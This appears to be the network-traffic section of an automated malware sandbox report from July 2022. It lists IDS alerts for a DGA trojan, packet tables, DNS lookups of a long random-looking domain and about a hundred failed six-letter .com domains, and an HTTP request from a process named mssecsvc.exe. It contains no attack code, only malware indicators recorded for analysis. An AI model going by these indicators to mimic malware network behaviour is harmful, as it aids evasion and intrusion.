                                                                              8.8.8.8192.168.2.453524722811577 07/20/22-17:54:18.402667UDP2811577ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com)53524728.8.8.8192.168.2.4
                                                                              8.8.8.8192.168.2.453501212811577 07/20/22-17:54:40.097301UDP2811577ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com)53501218.8.8.8192.168.2.4

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jul 20, 2022 17:51:12.227129936 CEST4975680192.168.2.4104.16.173.80
                                                                              Jul 20, 2022 17:51:12.244617939 CEST8049756104.16.173.80192.168.2.4
                                                                              Jul 20, 2022 17:51:12.244714022 CEST4975680192.168.2.4104.16.173.80
                                                                              Jul 20, 2022 17:51:12.245254993 CEST4975680192.168.2.4104.16.173.80
                                                                              Jul 20, 2022 17:51:12.262600899 CEST8049756104.16.173.80192.168.2.4
                                                                              Jul 20, 2022 17:51:12.277767897 CEST8049756104.16.173.80192.168.2.4
                                                                              Jul 20, 2022 17:51:12.277880907 CEST8049756104.16.173.80192.168.2.4
                                                                              Jul 20, 2022 17:51:12.277899981 CEST4975680192.168.2.4104.16.173.80
                                                                              Jul 20, 2022 17:51:12.277959108 CEST4975680192.168.2.4104.16.173.80
                                                                              Jul 20, 2022 17:51:12.278322935 CEST4975680192.168.2.4104.16.173.80
                                                                              Jul 20, 2022 17:51:12.295485973 CEST8049756104.16.173.80192.168.2.4
                                                                              Jul 20, 2022 17:54:08.426199913 CEST4979280192.168.2.4104.17.244.81
                                                                              Jul 20, 2022 17:54:08.442748070 CEST8049792104.17.244.81192.168.2.4
                                                                              Jul 20, 2022 17:54:08.443643093 CEST4979280192.168.2.4104.17.244.81
                                                                              Jul 20, 2022 17:54:08.444561958 CEST4979280192.168.2.4104.17.244.81
                                                                              Jul 20, 2022 17:54:08.461271048 CEST8049792104.17.244.81192.168.2.4
                                                                              Jul 20, 2022 17:54:08.478476048 CEST8049792104.17.244.81192.168.2.4
                                                                              Jul 20, 2022 17:54:08.478672981 CEST4979280192.168.2.4104.17.244.81
                                                                              Jul 20, 2022 17:54:08.478925943 CEST4979280192.168.2.4104.17.244.81
                                                                              Jul 20, 2022 17:54:08.496335030 CEST8049792104.17.244.81192.168.2.4
                                                                              Jul 20, 2022 17:54:08.703829050 CEST8049792104.17.244.81192.168.2.4
                                                                              Jul 20, 2022 17:54:08.703948021 CEST4979280192.168.2.4104.17.244.81

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jul 20, 2022 17:51:12.176393986 CEST6050653192.168.2.48.8.8.8
                                                                              Jul 20, 2022 17:51:12.196624041 CEST53605068.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:08.365417957 CEST5817153192.168.2.48.8.8.8
                                                                              Jul 20, 2022 17:54:08.385657072 CEST53581718.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.258260965 CEST53605128.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.308201075 CEST53613618.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.335342884 CEST53504458.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.367090940 CEST53516798.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.402667046 CEST53524728.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.451947927 CEST53623548.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.481395960 CEST53500618.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.517307997 CEST53606128.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.565526009 CEST53588168.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.615561008 CEST53564378.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.643445969 CEST53648258.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.676141977 CEST53539898.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.726281881 CEST53634318.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.756714106 CEST53569018.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.792995930 CEST53508008.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.904059887 CEST53522568.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:18.969556093 CEST53610818.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.006818056 CEST53637128.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.046688080 CEST53643168.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.079499006 CEST53507788.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.110985994 CEST53614868.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.160911083 CEST53614978.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.191792965 CEST53551428.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.232403994 CEST53552718.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.268182993 CEST53649488.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.301373005 CEST53604188.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.333065987 CEST53642598.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.368571997 CEST53610688.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.405153036 CEST53587158.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.433872938 CEST53578168.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.463195086 CEST53517878.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.505987883 CEST53539168.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.553107977 CEST53607908.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.583656073 CEST53627088.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:19.775619030 CEST53609468.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:39.945770979 CEST53579928.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:39.983746052 CEST53556648.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.029886961 CEST53554798.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.059593916 CEST53516798.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.097301006 CEST53501218.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.132085085 CEST53610308.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.181905985 CEST53624688.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.232880116 CEST53507378.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.284487963 CEST53539708.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.320353985 CEST53618498.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.373653889 CEST53626438.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.424299955 CEST53618888.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.478235006 CEST53614998.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.506979942 CEST53633568.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.558136940 CEST53573768.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.596235037 CEST53634298.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.630182981 CEST53512398.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.678375959 CEST53526568.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.716212988 CEST53611358.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.753846884 CEST53514178.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.804666996 CEST53570208.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.915461063 CEST53556598.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:40.979768038 CEST53495798.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:41.167217016 CEST53604458.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:41.251645088 CEST53548138.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:41.281882048 CEST53565208.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:41.383841038 CEST53498908.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:41.454515934 CEST53578388.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:41.494239092 CEST53546618.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:41.573896885 CEST53626468.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:41.625000000 CEST53555698.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:41.678946972 CEST53611148.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:54:41.718364954 CEST53513988.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:01.915558100 CEST53650608.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:01.948951006 CEST53517288.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.058417082 CEST53507808.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.088565111 CEST53564168.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.126056910 CEST53575468.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.162512064 CEST53627648.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.192738056 CEST53510828.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.220952988 CEST53641358.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.257361889 CEST53512858.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.305938005 CEST53636488.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.334044933 CEST53514698.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.441952944 CEST53539198.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.551109076 CEST53638638.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.586520910 CEST53573168.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.620600939 CEST53629488.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.660648108 CEST53496438.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.690216064 CEST53622258.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.727658987 CEST53635558.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.757400036 CEST53518638.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.793215990 CEST53516728.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.840558052 CEST53497798.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.885500908 CEST53649258.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.931385040 CEST53573478.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:02.980429888 CEST53496568.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:03.011116028 CEST53627398.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:03.042330027 CEST53614578.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:03.076562881 CEST53598458.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:03.105895996 CEST53642368.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:03.217895985 CEST53640448.8.8.8192.168.2.4
                                                                              Jul 20, 2022 17:55:03.264223099 CEST53573618.8.8.8192.168.2.4

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                              Jul 20, 2022 17:51:12.176393986 CEST192.168.2.48.8.8.80x6cabStandard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:08.365417957 CEST192.168.2.48.8.8.80xa53aStandard query (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comA (IP address)IN (0x0001)

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                              Jul 20, 2022 17:51:12.196624041 CEST8.8.8.8192.168.2.40x6cabNo error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.16.173.80A (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:51:12.196624041 CEST8.8.8.8192.168.2.40x6cabNo error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.17.244.81A (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:51:41.309281111 CEST8.8.8.8192.168.2.40xe8fcNo error (0)www-bing-com.dual-a-0001.a-msedge.netdual-a-0001.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                              Jul 20, 2022 17:51:41.309281111 CEST8.8.8.8192.168.2.40xe8fcNo error (0)dual-a-0001.a-msedge.net204.79.197.200A (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:51:41.309281111 CEST8.8.8.8192.168.2.40xe8fcNo error (0)dual-a-0001.a-msedge.net13.107.21.200A (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:08.385657072 CEST8.8.8.8192.168.2.40xa53aNo error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.17.244.81A (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:08.385657072 CEST8.8.8.8192.168.2.40xa53aNo error (0)www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com104.16.173.80A (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.258260965 CEST8.8.8.8192.168.2.40x87bdName error (3)ipffhg.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.308201075 CEST8.8.8.8192.168.2.40x269aName error (3)uehixu.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.335342884 CEST8.8.8.8192.168.2.40xae97Name error (3)umdeki.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.367090940 CEST8.8.8.8192.168.2.40x9d70Name error (3)btstvf.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.402667046 CEST8.8.8.8192.168.2.40x74e6Name error (3)veadit.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.451947927 CEST8.8.8.8192.168.2.40xf68fName error (3)xpokac.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.481395960 CEST8.8.8.8192.168.2.40x80e7Name error (3)jreavt.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.517307997 CEST8.8.8.8192.168.2.40x2b21Name error (3)kdbimr.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.565526009 CEST8.8.8.8192.168.2.40x551cName error (3)ivhjyg.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.615561008 CEST8.8.8.8192.168.2.40x58f8Name error (3)fnkuzp.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.643445969 CEST8.8.8.8192.168.2.40x1755Name error (3)wwflce.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.676141977 CEST8.8.8.8192.168.2.40xaccdName error (3)zrsyos.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.726281881 CEST8.8.8.8192.168.2.40x13daName error (3)halijb.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.756714106 CEST8.8.8.8192.168.2.40xdf4eName error (3)dsebsq.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.792995930 CEST8.8.8.8192.168.2.40xacccName error (3)ehoouc.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.904059887 CEST8.8.8.8192.168.2.40xbaa0Name error (3)rhekpv.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:18.969556093 CEST8.8.8.8192.168.2.40x7a3fName error (3)kxvxyi.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.006818056 CEST8.8.8.8192.168.2.40x1b4eName error (3)pamieb.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.046688080 CEST8.8.8.8192.168.2.40x41fcName error (3)ttaxui.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.079499006 CEST8.8.8.8192.168.2.40x80c3Name error (3)csvfep.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.110985994 CEST8.8.8.8192.168.2.40xed20Name error (3)rayrbu.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.160911083 CEST8.8.8.8192.168.2.40x3e4aName error (3)evcswy.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.191792965 CEST8.8.8.8192.168.2.40x31cfName error (3)daufsi.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.232403994 CEST8.8.8.8192.168.2.40x7248Name error (3)lbhuwa.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.268182993 CEST8.8.8.8192.168.2.40xfffdName error (3)bxgyim.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.301373005 CEST8.8.8.8192.168.2.40x25ecName error (3)odknak.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.333065987 CEST8.8.8.8192.168.2.40xeb79Name error (3)imeonl.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.368571997 CEST8.8.8.8192.168.2.40x7b4cName error (3)ohpqsg.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.405153036 CEST8.8.8.8192.168.2.40x3c9cName error (3)tqrihq.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.433872938 CEST8.8.8.8192.168.2.40x6abdName error (3)rybavi.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.463195086 CEST8.8.8.8192.168.2.40x6c13Name error (3)oyiqis.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.505987883 CEST8.8.8.8192.168.2.40xc030Name error (3)oattpq.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.553107977 CEST8.8.8.8192.168.2.40xe33Name error (3)ecihey.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.583656073 CEST8.8.8.8192.168.2.40x6516Name error (3)pjyjyp.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:19.775619030 CEST8.8.8.8192.168.2.40xf493Name error (3)qzemuq.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:39.945770979 CEST8.8.8.8192.168.2.40x9bf8Name error (3)bjnyie.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:39.983746052 CEST8.8.8.8192.168.2.40xd1fdName error (3)ouuquq.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.029886961 CEST8.8.8.8192.168.2.40x2204Name error (3)hmogya.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.059593916 CEST8.8.8.8192.168.2.40x69e1Name error (3)gveozl.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.097301006 CEST8.8.8.8192.168.2.40x74eeName error (3)cjtnlz.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.132085085 CEST8.8.8.8192.168.2.40x6f0cName error (3)zjercf.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.181905985 CEST8.8.8.8192.168.2.40x25b7Name error (3)punodi.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.232880116 CEST8.8.8.8192.168.2.40x3f8bName error (3)fmghaw.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.284487963 CEST8.8.8.8192.168.2.40x4140Name error (3)gyrtfu.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.320353985 CEST8.8.8.8192.168.2.40x5bfeName error (3)ieuydr.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.373653889 CEST8.8.8.8192.168.2.40x7f2dName error (3)foefmh.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.424299955 CEST8.8.8.8192.168.2.40xdee3Name error (3)wdsbch.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.478235006 CEST8.8.8.8192.168.2.40x625bName error (3)dlaiin.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.506979942 CEST8.8.8.8192.168.2.40x3ea9Name error (3)buquni.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.558136940 CEST8.8.8.8192.168.2.40x945bName error (3)yyoujc.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.596235037 CEST8.8.8.8192.168.2.40x2bddName error (3)iqkpke.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.630182981 CEST8.8.8.8192.168.2.40x230aName error (3)xpuiqt.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.678375959 CEST8.8.8.8192.168.2.40x1c92Name error (3)aqoyoy.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.716212988 CEST8.8.8.8192.168.2.40x9649Name error (3)fotkqb.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.753846884 CEST8.8.8.8192.168.2.40x1eabName error (3)bixitk.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.804666996 CEST8.8.8.8192.168.2.40x796aName error (3)oyjapg.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.915461063 CEST8.8.8.8192.168.2.40x8cc5Name error (3)wxqeub.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:40.979768038 CEST8.8.8.8192.168.2.40x17f5Name error (3)ppuoul.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:41.167217016 CEST8.8.8.8192.168.2.40xfa4bName error (3)uuvznv.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:41.251645088 CEST8.8.8.8192.168.2.40x3a54Name error (3)ppdeuk.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:41.281882048 CEST8.8.8.8192.168.2.40xa7d5Name error (3)yupiov.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:41.383841038 CEST8.8.8.8192.168.2.40xb9fdName error (3)eyueag.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:41.454515934 CEST8.8.8.8192.168.2.40x83c1Name error (3)ilezol.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:41.494239092 CEST8.8.8.8192.168.2.40xdadName error (3)odkwag.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:41.573896885 CEST8.8.8.8192.168.2.40x25a9Name error (3)kvzuyb.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:41.625000000 CEST8.8.8.8192.168.2.40x8ed1Name error (3)ywhiza.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:41.678946972 CEST8.8.8.8192.168.2.40x80b1Name error (3)wzzoyp.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:54:41.718364954 CEST8.8.8.8192.168.2.40xdaa9Name error (3)qdauqi.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:01.915558100 CEST8.8.8.8192.168.2.40x796Name error (3)riwegs.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:01.948951006 CEST8.8.8.8192.168.2.40x99afName error (3)uyhjyx.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.058417082 CEST8.8.8.8192.168.2.40x9e39Name error (3)parenq.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.088565111 CEST8.8.8.8192.168.2.40x4e61Name error (3)egzhiu.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.126056910 CEST8.8.8.8192.168.2.40x1a9dName error (3)ytohqg.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.162512064 CEST8.8.8.8192.168.2.40xd8f5Name error (3)xnynlv.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.192738056 CEST8.8.8.8192.168.2.40x3f5cName error (3)seumyy.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.220952988 CEST8.8.8.8192.168.2.40x746Name error (3)kkujyi.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.257361889 CEST8.8.8.8192.168.2.40xddffName error (3)iigysp.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.305938005 CEST8.8.8.8192.168.2.40x7214Name error (3)swihwi.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.334044933 CEST8.8.8.8192.168.2.40xd0cName error (3)yilrau.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.441952944 CEST8.8.8.8192.168.2.40x3340Name error (3)bwhvdc.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.551109076 CEST8.8.8.8192.168.2.40x9024Name error (3)ryeofz.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.586520910 CEST8.8.8.8192.168.2.40x7c4eName error (3)vscxig.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.620600939 CEST8.8.8.8192.168.2.40x553fName error (3)juiape.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.660648108 CEST8.8.8.8192.168.2.40xc16fName error (3)iegroa.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.690216064 CEST8.8.8.8192.168.2.40xb71eName error (3)pzrdea.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.727658987 CEST8.8.8.8192.168.2.40x984cName error (3)fmleqf.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.757400036 CEST8.8.8.8192.168.2.40x660dName error (3)nsnpie.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.793215990 CEST8.8.8.8192.168.2.40x36d1Name error (3)poyvid.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.840558052 CEST8.8.8.8192.168.2.40xed3eName error (3)naciyn.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.885500908 CEST8.8.8.8192.168.2.40x3443Name error (3)zajvof.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.931385040 CEST8.8.8.8192.168.2.40xde1eName error (3)exylvw.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:02.980429888 CEST8.8.8.8192.168.2.40x8528Name error (3)gieomq.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:03.011116028 CEST8.8.8.8192.168.2.40x3084Name error (3)ryrgex.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:03.042330027 CEST8.8.8.8192.168.2.40x7c73Name error (3)picaiu.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:03.076562881 CEST8.8.8.8192.168.2.40xcb94Name error (3)iuzrbo.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:03.105895996 CEST8.8.8.8192.168.2.40x3b46Name error (3)pbswoe.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:03.217895985 CEST8.8.8.8192.168.2.40x5901Name error (3)taseju.comnonenoneA (IP address)IN (0x0001)
                                                                              Jul 20, 2022 17:55:03.264223099 CEST8.8.8.8192.168.2.40xecdeName error (3)eunure.comnonenoneA (IP address)IN (0x0001)

                                                                              HTTP Request Dependency Graph

                                                                              • www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              0192.168.2.449756104.16.173.8080C:\Windows\mssecsvc.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jul 20, 2022 17:51:12.245254993 CEST1011OUTGET / HTTP/1.1
                                                                              Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                                              Cache-Control: no-cache
                                                                              Jul 20, 2022 17:51:12.277767897 CEST1012INHTTP/1.1 200 OK
                                                                              Date: Wed, 20 Jul 2022 15:51:12 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 607
                                                                              Connection: close
                                                                              Server: cloudflare
                                                                              CF-RAY: 72dcdb5d9c7e9ba6-FRA
